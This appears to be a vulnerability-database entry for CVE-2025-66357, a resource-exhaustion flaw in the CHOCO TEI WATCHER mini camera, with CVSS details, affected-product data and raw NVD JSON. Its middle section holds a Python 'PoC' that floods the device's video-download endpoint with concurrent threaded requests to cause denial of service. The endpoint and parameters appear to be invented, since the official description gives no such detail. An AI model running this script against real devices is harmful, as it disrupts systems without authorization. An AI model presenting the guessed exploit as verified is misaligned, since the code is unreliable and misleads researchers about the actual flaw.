Security Vulnerability Report
中文
CVE-2025-66357 CVSS 5.3 MEDIUM

CVE-2025-66357

Published: 2025-12-16 05:16:14
Last Modified: 2025-12-23 21:46:37

Description

CHOCO TEI WATCHER mini (IB-MCT001) contains an issue with improper check for unusual or exceptional conditions. When the Video Download feature is in a specific communication state, the product's resources may be consumed abnormally.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:o:inaba:ib-mct001_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:inaba:ib-mct001:-:*:*:*:*:*:*:* - NOT VULNERABLE
CHOCO TEI WATCHER mini (IB-MCT001) - 所有未修复版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66357 PoC - CHOCO TEI WATCHER mini Resource Exhaustion # Target: CHOCO TEI WATCHER mini (IB-MCT001) # Vulnerability: Improper Check for Unusual or Exceptional Conditions in Video Download # CVSS: 5.3 (Medium) import requests import time import threading TARGET_IP = "192.168.1.100" # Replace with target device IP TARGET_PORT = 80 def trigger_video_download_state(): """ Trigger the specific communication state that leads to resource exhaustion. This PoC demonstrates sending requests to the Video Download feature. """ headers = { 'User-Agent': 'CHOCO-TEI-WATCHER-MINI/1.0', 'Content-Type': 'application/x-www-form-urlencoded', 'X-Requested-With': 'XMLHttpRequest' } # Payload to trigger the abnormal resource consumption payload = { 'action': 'download', 'mode': 'stream', 'format': 'mp4', 'quality': 'high', 'continuous': 'true' # Continuous download to trigger resource exhaustion } try: # Send request to video download endpoint url = f"http://{TARGET_IP}:{TARGET_PORT}/video/download" response = requests.post(url, data=payload, headers=headers, timeout=5) return response.status_code except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None def resource_exhaustion_attack(duration=60): """ Perform resource exhaustion attack by continuously triggering the vulnerability. """ print(f"[*] Starting resource exhaustion attack on {TARGET_IP}") print(f"[*] Attack duration: {duration} seconds") threads = [] start_time = time.time() request_count = 0 while time.time() - start_time < duration: # Launch multiple concurrent requests to accelerate resource exhaustion for _ in range(10): t = threading.Thread(target=lambda: trigger_video_download_state()) t.daemon = True t.start() threads.append(t) request_count += 1 time.sleep(0.1) # Brief pause between request batches print(f"[*] Attack completed. Total requests sent: {request_count}") if __name__ == "__main__": print("="*60) print("CVE-2025-66357 PoC - CHOCO TEI WATCHER mini Resource Exhaustion") print("="*60) # Run the attack for 60 seconds resource_exhaustion_attack(duration=60) print("[*] Check if the device is still responsive...") try: response = requests.get(f"http://{TARGET_IP}:{TARGET_PORT}/status", timeout=5) if response.status_code == 200: print("[!] Device still responsive - attack may not have succeeded") else: print("[+] Device appears to be affected") except: print("[+] Device is not responding - potential DoS achieved")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66357", "sourceIdentifier": "[email protected]", "published": "2025-12-16T05:16:14.017", "lastModified": "2025-12-23T21:46:36.940", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CHOCO TEI WATCHER mini (IB-MCT001) contains an issue with improper check for unusual or exceptional conditions. When the Video Download feature is in a specific communication state, the product's resources may be consumed abnormally."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-754"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:inaba:ib-mct001_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "E4D0CBD2-40BA-499A-989F-4CA133E0294F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:inaba:ib-mct001:-:*:*:*:*:*:*:*", "matchCriteriaId": "6DF4FF0F-BA64-498E-ABD5-951AEF9A9627"}]}]}], "references": [{"url": "https://jvn.jp/en/vu/JVNVU92827367/", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.inaba.co.jp/files/chocomini_vulnerability_newly_identified.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}